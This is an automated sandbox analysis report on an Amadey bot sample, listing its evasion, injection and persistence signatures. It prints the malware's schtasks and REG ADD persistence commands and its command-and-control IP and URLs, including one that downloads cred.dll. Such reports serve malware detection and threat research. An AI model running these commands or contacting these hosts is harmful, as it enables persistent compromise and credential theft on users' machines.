Source: yIF7nMz573.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: 4C:\muga-banel\tuf3_karas\xeyuno\kuzonubo\hezu\1\tex49.pdbhQE source: yIF7nMz573.exe, bguuwe.exe.0.dr
Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: bguuwe.exe, bguuwe.exe, 0000000A.00000003.309573312.0000000002680000.00000004.00001000.00020000.00000000.sdmp, bguuwe.exe, 0000000A.00000002.310851152.0000000000400000.00000040.00000001.01000000.00000004.sdmp, bguuwe.exe, 00000013.00000003.436338971.0000000001010000.00000004.00001000.00020000.00000000.sdmp, bguuwe.exe, 00000013.00000002.437486522.0000000000400000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: C:\muga-banel\tuf3_karas\xeyuno\kuzonubo\hezu\1\tex49.pdb source: yIF7nMz573.exe, bguuwe.exe.0.dr

Data Obfuscation
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\yIF7nMz573.exe Unpacked PE file: 0.2.yIF7nMz573.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Unpacked PE file: 10.2.bguuwe.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Unpacked PE file: 19.2.bguuwe.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\yIF7nMz573.exe Unpacked PE file: 0.2.yIF7nMz573.exe.400000.0.unpack .text:ER;.data:W;.sez:W;.yasufo:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Unpacked PE file: 10.2.bguuwe.exe.400000.0.unpack .text:ER;.data:W;.sez:W;.yasufo:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Unpacked PE file: 19.2.bguuwe.exe.400000.0.unpack .text:ER;.data:W;.sez:W;.yasufo:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00418956 push ecx; ret 0_2_00418969
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00EA5D2A push ecx; iretd 0_2_00EA5D37
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00EA4F63 push es; iretd 0_2_00EA4F83
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_00418956 push ecx; ret 10_2_00418969
PE file contains sections with non-standard names
Source: yIF7nMz573.exe Static PE information: section name: .sez
Source: yIF7nMz573.exe Static PE information: section name: .yasufo
Source: bguuwe.exe.0.dr Static PE information: section name: .sez
Source: bguuwe.exe.0.dr Static PE information: section name: .yasufo

Persistence and Installation Behavior
barindex
Yara detected Amadey bot
Source: Yara match File source: dump.pcap, type: PCAP
Drops PE files
Source: C:\Users\user\Desktop\yIF7nMz573.exe File created: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Jump to dropped file

Boot Survival
barindex
Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\reg.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe" /F
Source: C:\Users\user\Desktop\yIF7nMz573.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6844 Thread sleep count: 154 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6844 Thread sleep time: -4620000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6848 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6840 Thread sleep count: 154 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6840 Thread sleep time: -4620000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6612 Thread sleep count: 142 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6612 Thread sleep time: -4260000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6828 Thread sleep time: -390000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6852 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6840 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6844 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6612 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\yIF7nMz573.exe API coverage: 6.2 %
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe API coverage: 7.1 %
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_004051C0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetSystemMetrics, 0_2_004051C0
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_004244D2 FindFirstFileExW, 0_2_004244D2
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_004244D2 FindFirstFileExW, 10_2_004244D2
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Thread delayed: delay time: 50000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Thread delayed: delay time: 30000 Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00418737 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00418737
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00425728 GetProcessHeap, 0_2_00425728
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_0041F362 mov eax, dword ptr fs:[00000030h] 0_2_0041F362
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_0041B5D1 mov eax, dword ptr fs:[00000030h] 0_2_0041B5D1
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00EA1F83 push dword ptr fs:[00000030h] 0_2_00EA1F83
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_0041F362 mov eax, dword ptr fs:[00000030h] 10_2_0041F362
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_0041B5D1 mov eax, dword ptr fs:[00000030h] 10_2_0041B5D1
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00418737 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00418737
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_0041889C SetUnhandledExceptionFilter, 0_2_0041889C
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00417E33 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00417E33
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_0041DED6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041DED6
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_00418737 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_00418737
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_0041889C SetUnhandledExceptionFilter, 10_2_0041889C
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_00417E33 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_00417E33
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_0041DED6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_0041DED6

HIPS / PFW / Operating System Protection Evasion
barindex
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00403440 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree, 0_2_00403440
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\yIF7nMz573.exe Process created: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe" /F Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\ Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Queries volume information: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Queries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Queries volume information: C:\Users\user\AppData\Roaming\110809d565579c\cred.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Queries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Queries volume information: C:\Users\user\AppData\Roaming\110809d565579c\cred.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Queries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Queries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Queries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Queries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Queries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Queries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Queries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Queries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Queries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Queries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00418557 cpuid 0_2_00418557
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00418971 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00418971
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00427B81 _free,_free,_free,GetTimeZoneInformation,_free, 0_2_00427B81
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_004051C0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetSystemMetrics, 0_2_004051C0
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00413860 Sleep,IsUserAnAdmin,GetUserNameW,GetComputerNameExW, 0_2_00413860

Stealing of Sensitive Information
barindex
Yara detected Amadey bot
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 652395 Sample: yIF7nMz573.exe Startdate: 26/06/2022 Architecture: WINDOWS Score: 100 43 Snort IDS alert for network traffic 2->43 45 Multi AV Scanner detection for domain / URL 2->45 47 Antivirus detection for URL or domain 2->47 49 4 other signatures 2->49 8 yIF7nMz573.exe 3 2->8         started        12 bguuwe.exe 2->12         started        14 bguuwe.exe 2->14         started        process3 file4 31 C:\Users\user\AppData\Local\...\bguuwe.exe, PE32 8->31 dropped 53 Detected unpacking (changes PE section rights) 8->53 55 Detected unpacking (overwrites its own PE header) 8->55 57 Contains functionality to inject code into remote processes 8->57 16 bguuwe.exe 16 8->16         started        signatures5 process6 dnsIp7 33 185.215.113.15, 49742, 49743, 49744 WHOLESALECONNECTIONSNL Portugal 16->33 35 Multi AV Scanner detection for dropped file 16->35 37 Detected unpacking (changes PE section rights) 16->37 39 Detected unpacking (overwrites its own PE header) 16->39 41 2 other signatures 16->41 20 cmd.exe 1 16->20         started        22 schtasks.exe 1 16->22         started        signatures8 process9 process10 24 reg.exe 1 20->24         started        27 conhost.exe 20->27         started        29 conhost.exe 22->29         started        signatures11 51 Creates an undocumented autostart registry key 24->51
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.15
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.15/Lkb2dxj3/cred.dll true
  • 11%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://185.215.113.15/Lkb2dxj3/index.php?scr=1 true
  • 17%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://185.215.113.15/Lkb2dxj3/index.php true
  • 8%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
185.215.113.15/Lkb2dxj3/index.php true
  • Avira URL Cloud: malware
 low